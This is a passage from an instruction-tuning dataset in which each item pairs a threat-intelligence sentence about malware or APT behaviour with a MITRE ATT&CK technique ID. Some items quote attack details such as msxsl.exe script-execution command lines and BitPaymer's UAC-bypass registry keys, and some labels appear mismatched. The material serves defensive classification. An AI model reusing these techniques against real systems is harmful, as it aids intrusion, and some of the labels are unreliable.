or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FakeRun’s PDB string (D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb) indicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this process### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search websites owned by the victim for information that can be used during targeting.### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has deleted batch files after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has used rundll32.exe for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used the WMIEXEC utility to execute whoami commands on remote machines.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 used secure shell to move laterally among their targets.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can communicate over multiple C2 host and port combinations.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can load DLLs into memory.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse a container administration service to execute commands within a container.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3/30/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included): Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc   The payloads for these attacks varied in malware family### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used SSH to connect back to victim machines.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has the capability to download a VNC module from command and control .### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses a driver to scan for specific filesystem driver objects.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command-line examples: * msxsl.exe customers.xml script.xsl * msxsl.exe script.xsl script.xsl * msxsl.exe script.jpeg script.jpeg Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used HTTP and HTTPs for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has deployed tools after moving laterally using administrative accounts.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can implement DGA using the current date as a seed variable.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,load additional modules### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has staged collected data files under C:\Program Files\Common Files\System\Ole DB\.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used Google Cloud's appspot service to host C2 servers.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or initial access or Exploit Public-Facing Application.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors , packers, C2 protocols, and the creation of infected removable media.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has downloaded files onto a victim machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can search for different processes on a system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can download files to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to collect the victim PC name, disk drive information, and operating system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then reads and decrypts the content between these values to yield an IP address as shown below: ---- BEGIN SSH2 PUBLIC KEY ----Comment: ""rsa-key""AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ---- A Python script to decode strings encrypted with this technique is given in Appendix B – Python Scripts### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT has the capability to gather the victim's current directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8's malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has been delivered to victims via emails with malicious HTML attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has collected the hostname and operating system version from the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use information from previous reconnaissance efforts or Search Victim-Owned Websites to craft persuasive and believable lures.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has created scheduled tasks to persistently run VBScripts.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Macro Analysis When the victim opens the ThreeDollars document they are presented with the lure image and prompted to click on the “Enable Content” button### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used various types of scripting to perform operations, including Python scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used BITSAdmin to download additional tools.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used the C$ network share for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SID-History ### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used obfuscated variable names in a JavaScript configuration file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one example, BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance, including domain enumeration and network state, via ipconfig, net use, net user, and net view commands### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed using a hard coded list of passwords to brute force user accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can execute malicious JavaScript payloads on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT has a feature to access the webcam on the victim’s machine.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Loadable Kernel Modules are pieces of code that can be loaded and unloaded into the kernel upon demand.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has used msiexec to download and execute malicious installer files over HTTP.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actors have made some small changes, such as altering the variable names to avoid Yara detection### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon can execute commands on the victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are multiple ways to access the Task Scheduler in Windows.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has also used PowerShell for lateral movement and credential access.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM is a system within Windows to enable interaction between software components through the operating system.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT gathers information about opened windows during the initial infection.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can use cmd.exe to help execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to list running processes on the infected host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PCODE of the virtual machine is packed with the aplib packer### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses JavaScript to perform its core functionalities.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To obtain strings to treat as commands, the payload will issue a series of DNS queries to resolve domains with the following structure: --. The C2 server will provide responses to these queries that contain answers in IPv4 or IPv6 addresses depending on the type of DNS query the payload uses to communicate with its C2 server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has enumerated shared folders and mapped volumes.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has performed C2 using DNS via A, OPT, and TXT records.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Amazon Web Services Amazon Machine Images , Google Cloud Platform Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to list processes on the infected host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used VBS and VBE scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the readFiles function to return a detailed listing of a specified directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used a valid account to maintain persistence via scheduled task.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 can list files information for specific directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used WMI queries to check if various security applications were running, as well as the operating system version.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has the ability to download additional modules and a configuration file from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack’s RAT makes a persistent target file with auto execution on the host start.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka contains a module that captures screenshots of the victim's desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As we can see, the following information is present within this configuration: Remote Command and Control (C2) server Remote port Sleep timer Reaver continues to collect various information from the victim machine, including the following: CPU speed Computer name Username IP Address Microsoft Windows version Physical and virtual memory information The malware proceeds to communicate with the remote server via HTTP GET and POST requests### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can query shared drives on the local system.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server Web shell client.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used a Mac OS Python implant to gather data.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz saves system information into an XML file that is then XOR-encoded.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type network traffic can communicate over a raw socket.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can download remote files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of deleting files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This means that, for example, the sudo timeout of one tty will not affect another tty .### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork file stealer can run a TaskScheduler DLL to add persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has collected the victim machine's local IP address information and MAC address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's business tempo that can be used during targeting.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This function is able to obfuscate code so that every iteration of the code is presented differently### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used prodump to dump credentials from LSASS.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 added credentials to OAuth Applications and Service Principals.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses FTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 then created a WMI event subscription in order to execute the backdoor### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can discover logical drive information including the drive type, free space, and volume information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7's Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can download files from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad uses a DGA that is based on the day of the month for C2 servers.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has used several remote administration tools as persistent infiltration channels.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used the systeminfo command on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can disconnect previously connected remote drives.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has queried the AWS instance metadata service for credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use PowerShell to download and execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After obtaining a digital certificate, an adversary may then install that certificate on infrastructure under their control.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is capable of the following functions: Collect file/folder/drive information Download files and additional malware Launch/terminate/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode — instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui/rOptimizer.dll.mui to extract the C&C information and connect to it### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors can upload files from victim machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework., VNC ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can be added as a service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used wmi queries to gather information from the system.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can SSL encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PittyTiger has obtained and used tools such as Mimikatz and gsecdump.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has used HKLM\SOFTWARE\Microsoft\CurrentVersion\Run to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can download files and additional malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux has used HTTP in outbound communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs creates a new service named WmiApSrvEx to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used the service control manager on a remote system to disable services associated with security monitoring products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used spearphishing attachments to infect victims.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu collects the username from the victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook can download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE checks to see if the system is configured with ""Daylight"" time and checks for a specific region to be set for the timezone.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can delete folders and files including overwriting its executable with legitimate programs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to compress files with zip.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used various tools to steal files from the compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon looks for and attempts to stop anti-malware solutions.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are many ways an adversary can hijack DLL loads.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can suppress UAC prompts by setting the HKCU\Software\Classes\ms-settings\shell\open\command registry key on Windows 10 or HKCU\Software\Classes\mscfile\shell\open\command on Windows 7 and launching the eventvwr.msc process, which launches BitPaymer with elevated privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is encrypted by RC4, using the key {0xb5, 0x78, 0x62, 0x52, 0x98, 0x3e, 0x24, 0xd7, 